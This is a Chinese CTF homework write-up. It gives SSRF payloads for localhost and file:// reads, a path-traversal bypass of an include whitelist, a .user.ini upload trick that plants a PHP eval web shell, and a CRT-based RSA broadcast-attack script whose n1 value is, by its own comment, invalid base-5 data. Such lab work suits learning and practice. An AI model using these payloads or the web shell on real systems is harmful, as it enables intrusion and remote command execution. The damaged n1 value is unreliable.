
1.27作业

1web351

 #web351

// Excerpt only: $ch is created and given its target URL outside the lines shown here.
// NOTE(review): the `?url=` requests on this page suggest the target comes straight
// from the client -- confirm. Nothing in this excerpt limits the scheme or the
// destination host, so loopback addresses and file:// are fetched like any other URL.
// Restricting the handle to HTTP/HTTPS (CURLOPT_PROTOCOLS) and checking the resolved
// address against an allow-list before the request is the usual fix.
curl_setopt($ch, CURLOPT_HEADER, 0);           // leave response headers out of the output
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   // curl_exec() returns the body instead of printing it
$result=curl_exec($ch);

// The fetched body is echoed back unchanged, so whatever the server can reach is readable by the requester.
echo ($result);

【提示不允许外部访问】对应源码检查的是 $_SERVER['REMOTE_ADDR'],因此让服务端自己去请求本机地址:

?url=http://127.0.0.1/flag.php

伪协议可以读:url=file:///var/www/html/flag.php

2

import gmpy2
import  binascii
 
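def CRT(aList, mList):
    """Solve a system of congruences with the Chinese Remainder Theorem.

    Finds x with x ≡ aList[i] (mod mList[i]) for every i and returns it
    reduced modulo the product of all moduli.

    Args:
        aList: residues, one per congruence.
        mList: moduli, in the same order as ``aList``.

    Returns:
        The solution x in the range [0, prod(mList)); 0 for empty input.

    Raises:
        ValueError: if ``aList`` and ``mList`` differ in length.

    NOTE(review): the moduli have to be pairwise coprime. When they are not,
    ``gmpy2.invert`` finds no inverse and is expected to raise
    ZeroDivisionError -- confirm against the installed gmpy2 version.
    """
    # A silent mismatch would drop residues (or fail with IndexError halfway
    # through), so reject it before doing any arithmetic.
    if len(aList) != len(mList):
        raise ValueError("CRT: aList and mList must have the same length")

    # M = product of all moduli.
    M = 1
    for modulus in mList:
        M *= modulus

    x = 0
    for residue, modulus in zip(aList, mList):
        Mi = M // modulus                      # product of every other modulus
        Mi_inverse = gmpy2.invert(Mi, modulus)  # Mi^-1 mod modulus
        x += residue * Mi * Mi_inverse
    return x % M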
 
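if __name__ == "__main__":
    # Recover a message that was encrypted (presumably with the same small
    # exponent e) under three different RSA moduli: CRT combines the three
    # ciphertexts into m^e over the integers, and an integer e-th root then
    # yields m. This only works for unpadded ("textbook") RSA with a small e;
    # randomized padding such as OAEP removes the shared m^e value.
    #
    # ========== n c ==========
    # All six values are parsed below as base-5 digit strings.
    # NOTE(review): n1 as listed contains the digits 5-9, which are not valid
    # base-5 digits, so int(n1, 5) raises ValueError. The value looks damaged
    # or written in a different base -- confirm against the challenge data.
    n1 = "636585149594574746909030160182690866222909256464847291783000651837227921337237899651287943597773270944384034858925295744880727101606841413640006527614873110651410155893776548737823152943797884729130149758279127430044739254000426610922834573094957082589539445610828279428814524313491262061930512829074466232633130599104490893572093943832740301809630847541592548921200288222432789208650949937638303429456468889100192613859073752923812454212239908948930178355331390933536771065791817643978763045030833712326162883810638120029378337092938662174119747687899484603628344079493556601422498405360731958162719296160584042671057160241284852522913676264596201906163"
    c1 = "310020004234033304244200421414413320341301002123030311202340222410301423440312412440240244110200112141140201224032402232131204213012303204422003300004011434102141321223311243242010014140422411342304322201241112402132203101131221223004022003120002110230023341143201404311340311134230140231412201333333142402423134333211302102413111111424430032440123340034044314223400401224111323000242234420441240411021023100222003123214343030122032301042243"
    n2 = "302240000040421410144422133334143140011011044322223144412002220243001141141114123223331331304421113021231204322233120121444434210041232214144413244434424302311222143224402302432102242132244032010020113224011121043232143221203424243134044314022212024343100042342002432331144300214212414033414120004344211330224020301223033334324244031204240122301242232011303211220044222411134403012132420311110302442344021122101224411230002203344140143044114"
    c2 = "112200203404013430330214124004404423210041321043000303233141423344144222343401042200334033203124030011440014210112103234440312134032123400444344144233020130110134042102220302002413321102022414130443041144240310121020100310104334204234412411424420321211112232031121330310333414423433343322024400121200333330432223421433344122023012440013041401423202210124024431040013414313121123433424113113414422043330422002314144111134142044333404112240344"
    n3 = "332200324410041111434222123043121331442103233332422341041340412034230003314420311333101344231212130200312041044324431141033004333110021013020140020011222012300020041342040004002220210223122111314112124333211132230332124022423141214031303144444134403024420111423244424030030003340213032121303213343020401304243330001314023030121034113334404440421242240113103203013341231330004332040302440011324004130324034323430143102401440130242321424020323"
    c3 = "10013444120141130322433204124002242224332334011124210012440241402342100410331131441303242011002101323040403311120421304422222200324402244243322422444414043342130111111330022213203030324422101133032212042042243101434342203204121042113212104212423330331134311311114143200011240002111312122234340003403312040401043021433112031334324322123304112340014030132021432101130211241134422413442312013042141212003102211300321404043012124332013240431242"

    cList = [int(c1, 5), int(c2, 5), int(c3, 5)]
    nList = [int(n1, 5), int(n2, 5), int(n3, 5)]
    m_e = CRT(cList, nList)  # m^e, reduced modulo n1*n2*n3

    # e is not known, so try small candidates.
    for e in range(1, 10):
        root, exact = gmpy2.iroot(m_e, e)
        # A truncated root is just floor(m_e ** (1/e)) and cannot be the
        # plaintext, so only exact roots are decoded and printed.
        if not exact:
            continue
        print("加密指数e = %d:"%e)
        digits = hex(root)[2:]
        # unhexlify needs an even number of digits. The missing nibble is the
        # leading one; padding at the end would shift every byte.
        if len(digits) % 2 == 1:
            digits = '0' + digits
        flag = binascii.unhexlify(digits)
        print(flag)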

3

是mips程序(ida需要下插件),反编译我用的ghidra

4.1

含一个白名单和文件包含函数 include $_REQUEST['file']   

白名单:source.php或hint.php

绕过读取:

?file=source.php?/../../../../../../ffffllllaaaagggg

4.2

 检查文件头部信息、文件MIME类型,并把php和.htaccess列入了黑名单

.user.ini:

GIF89a 
auto_prepend_file=1.jpg


1.jpg:

GIF89a 
<?=eval($\_POST['cmd']);?>

5三体

兽音解密,base58,16进制转字符,凯撒密码

压缩包密码为英文threebody
